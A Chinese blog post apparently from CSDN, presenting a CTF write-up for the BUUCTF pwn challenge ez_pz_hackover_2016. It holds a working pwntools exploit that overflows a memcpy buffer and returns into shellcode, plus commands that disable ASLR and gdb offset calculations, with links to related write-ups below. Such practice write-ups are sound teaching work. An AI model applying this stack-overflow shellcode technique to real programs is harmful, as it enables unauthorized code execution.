buu之ez_pz_hackover_2016动态调试

已于 2024-07-04 11:40:43 修改
阅读量269 收藏 4
点赞数 9
分类专栏: # CTF 文章标签: pwn
于 2024-07-04 11:21:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52772399/article/details/140173261
版权

ez_pz_hackover_2016

我看过一些师傅的wp,不是很好理解,我这里从动态调试入手
题目类型:retshellcode
所需知识:栈结构
题目流程我就不说了
直接上exp

from pwn import*

io=process('./ez_pz_hackover_2016')

context(log_level="debug",arch='i386')
gdb.attach(io,'b *0x8048600') 

shellcode=asm(shellcraft.sh())

io.recvuntil(b'crash: ')
sta=int(io.recv(10),16)
print("sta==>"+hex(sta))

payload=b'crashme\x00'+b'a'*(0x16-8) +b"bbbb" + p32(sta-0x1c) + shellcode

io.sendlineafter('>',payload)
pause()

io.interactive()

首先要做的事确定要填充多少字节的数据,才能覆盖返回地址
在这里插入图片描述
如果你从这个dest到ebp的位置来算,会出问题的
我们直接上gdb,断点下在nop位置
在这里插入图片描述
在此之前,先关闭地址随机化,更方便调试

sudo su
echo 0 > /proc/sys/kernel/randomize_va_space

在这里插入图片描述
我们可以算出从dest的输入地址到ebp地址的距离
0xffffcd18 - 0xffffcd02 = 0x16
所以我们要覆盖0x16字节的数据到ebp的位置

之后就是确定返回地址,程序是打印了变量s在栈上的地址
在这里插入图片描述
然后s在栈上的位置
在这里插入图片描述
程序在调用vuln函数的时候,它实在原有栈地址上直接压栈的,也就是说没有弹栈之前数据地址没有变
所以我们可以用0xffffcd3c得到返回地址
0xffffcd3c - 0x1c = 0xffffcd20
为什么是0xffffcd20,因为0xffffcd20是我们写入shellcode的起始位置。
ok,写完我就感觉我写的好没水平啊,就这样了

ReTCyc1e
关注
专栏目录
ez_pz_hackover_2016
m0_52231248的博客
11-18 147
ez_pz_hackover_2016 Checksec: Ida: Fgets会读取我们的输入但存在一个strlen检查,我们知道strlen在读入/x00就会停止。 同时当我们的输入包含crashme的时候会进入vlun函数, Vlun函数里的memcpy会拷贝我们之前的输入,存在溢出 所以我们只需要构造payload=crashme/x00+偏移+返回地址+shellcode就行了 Crashme/X00到ebp的偏移: 0xffffcd58-0xffffcd42=0x16
[GYCTF2020]Ez_Express
snowlyzz的博客
09-03 641
JavaScript 原型链学习
[BUUCTF-pwn]——ez_pz_hackover_2016
Y_peak的博客
02-15 336
[BUUCTF-pwn]——ez_pz_hackover_2016 题目地址:https://buuoj.cn/challenges#ez_pz_hackover_2016 checksec一下,NX都没开,十有八九是让自己写shellcode了 在IDA中,main里面没什么可以看的. 在chall函数中发现,0x40C = 1036 > 1023无法栈溢出。不过总算找到可以写shellcode 的地方。 发现vuln函数,只要通过输入"crashme\x00"就可以绕过检查,执行vuln
ez_pz_hackover_2016及简单gdb调试寻找所需地址
最新发布
2301_81504456的博客
07-26 405
简单gdb调试和NX未打开下的ret2shellcode
3S软件
Zzzpiu的博客
12-29 456
地址:https://www.ixxin.cn/software.html 转载地址:https://www.ixxin.cn/software.html
buuctf——not_the_same_3dsctf_2016
qq_41560595的博客
03-26 479
这道题和前面分析过的get_started_3dsctf_2016差不多,换汤不换药。 选择一个地址0x080EB000,用来装shellcode。这个地址要改成可执行的。使用mprotect函数改变。 解题代码: from pwn import * #p=process("./not") p=remote("node3.buuoj.cn",29607) elf=ELF("./not") read=elf.symbols["read"] mprotect=elf.symbols["mprotect"] m
BUU】ciscn_2019_c_1
bzduanlei的博客
07-30 266
一、解题思路 0x01 检查文件 开启了NX保护,堆栈不可执行。 0x02 将文件拖入IDA分析 分析主函数,发现get(s)函数存在栈溢出。 0x03 未寻找到system和‘/bin/sh’,需要通过puts函数泄露远端服务器中libc的基址,从而利用远端服务器libc中的system和字符串‘/bin/sh’的地址构造payload。 借助LibcSearcher工具,查找函数在内存中的真正地址。 LibcSearcher安装: git clone https://github.com/liean
BUU刷题 easy_heap
清霂的博客
05-13 230
目录easyheapmagicheapciscn_2019_n_3 easyheap #!/usr/bin/env python2 # coding=utf-8 from pwn import * arch = "amd64" filename = "easyheap" context(os="linux", arch=arch, log_level="debug") content = 1 offset = 0 # elf elf = ELF(filename) fake_heap_addr=0x6
BUU_re_[ACTF新生赛2020]usualCrypt
goat_2003的博客
09-04 247
首先拖入ida中 int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // esi int result; // eax int v5[3]; // [esp+8h] [ebp-74h] BYREF __int16 v6; // [esp+14h] [ebp-68h] char v7; // [esp+16h] [ebp-66h] char v8[100]; // [esp+18h] [
memcpy
weixin_45959515的博客
08-26 178
memcpy指的是C和C++使用的内存拷贝函数,函数原型为void *memcpy(void *destin, void *source, unsigned n);函数的功能是从源内存地址的起始位置开始拷贝若干个字节到目标内存地址中,即从源source中拷贝n个字节到目标destin中。 memcpy(c, temp, sizeof(char) * temp_size); ...
buuctf ez_pz_hackover_2016
qq_73625550的博客
05-26 550
使用gdb调试来计算偏移,ret2shecllcode,栈溢出
BUUCTF-ez_pz_hackover_2016
Rt1Text的博客
11-28 424
challC 库函数 - strcmp()C 库函数 int strcmp(const char *str1, const char *str2) 把 str1 所指向的字符串和 str2 所指向的字符串进行比较。strcmp只能比较字符串,比较数组和字符串常量,不能比较数字等其他形式的参数。两个字符串自左向右逐个字符相比(按ASCII值大小相比较),直到出现不同的字符或遇'\0'为止strcmp的返回值可控,传入空字符串即可strlen同样遇0截断。
buu crackrtf
09-26
BUU CrackRTF是一个密码破解题目,其中涉及到了密码的加密和解密过程。在分析代码的过程中,我们可以看到有两个函数sub_40100F和sub_401005。sub_40100F函数是从AAA文件中取出字符和密码进行异或操作,而sub_401005函数则是对数据进行异或操作并生成了一个RTF文件。 根据代码分析,我们可以得到以下步骤来破解这个密码: 1. 首先,我们需要找到AAA文件中的数据和密码进行异或操作。 2. 我们可以使用ResourceHacker这个工具来查看AAA文件中的资源,并获取需要异或的数据。 3. 将获取到的数据和输入的密码进行异或操作,得到解密后的字符串。 请注意,以上步骤仅仅是对代码进行分析后的一种破解思路,具体操作还需要根据实际情况进行调整。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值